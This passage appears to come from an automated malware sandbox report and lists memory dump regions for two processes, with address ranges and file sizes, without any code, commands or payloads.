                                                                                                                                                                                        Filesize

                                                                                                                                                                                        756KB

                                                                                                                                                                                      • memory/3476-14-0x00007FFC22150000-0x00007FFC22C12000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        10.8MB

                                                                                                                                                                                      • memory/3476-1077-0x00007FFC22150000-0x00007FFC22C12000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        10.8MB

                                                                                                                                                                                      • memory/3476-21-0x00007FFC40910000-0x00007FFC40B08000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        2.0MB

                                                                                                                                                                                      • memory/3476-19-0x00007FFC3E980000-0x00007FFC3EA3D000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        756KB

                                                                                                                                                                                      • memory/3476-48-0x00007FFC22150000-0x00007FFC22C12000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        10.8MB

                                                                                                                                                                                      • memory/3476-1-0x00007FFC22153000-0x00007FFC22155000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        8KB

                                                                                                                                                                                      • memory/3476-35-0x00007FFC22150000-0x00007FFC22C12000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        10.8MB

                                                                                                                                                                                      • memory/3476-18-0x00007FFC40910000-0x00007FFC40B08000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        2.0MB

                                                                                                                                                                                      • memory/3476-17-0x000002719A690000-0x000002719A6E8000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        352KB

                                                                                                                                                                                      • memory/3476-16-0x00000271A38F0000-0x00000271A3C80000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        3.6MB

                                                                                                                                                                                      • memory/3476-15-0x000002719A730000-0x000002719B588000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        14.3MB

                                                                                                                                                                                      • memory/3476-2-0x00000271FDFB0000-0x00000271FDFD2000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        136KB

                                                                                                                                                                                      • memory/3476-13-0x00007FFC22150000-0x00007FFC22C12000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        10.8MB

                                                                                                                                                                                      • memory/3476-20-0x000002719A6F0000-0x000002719A6FA000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        40KB

                                                                                                                                                                                      • memory/3476-34-0x00007FFC22153000-0x00007FFC22155000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        8KB

                                                                                                                                                                                      • memory/3476-12-0x00007FFC22150000-0x00007FFC22C12000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        10.8MB

                                                                                                                                                                                      • memory/4540-25-0x0000000140000000-0x0000000140004000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        16KB

                                                                                                                                                                                      • memory/4540-23-0x0000000140000000-0x0000000140004000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        16KB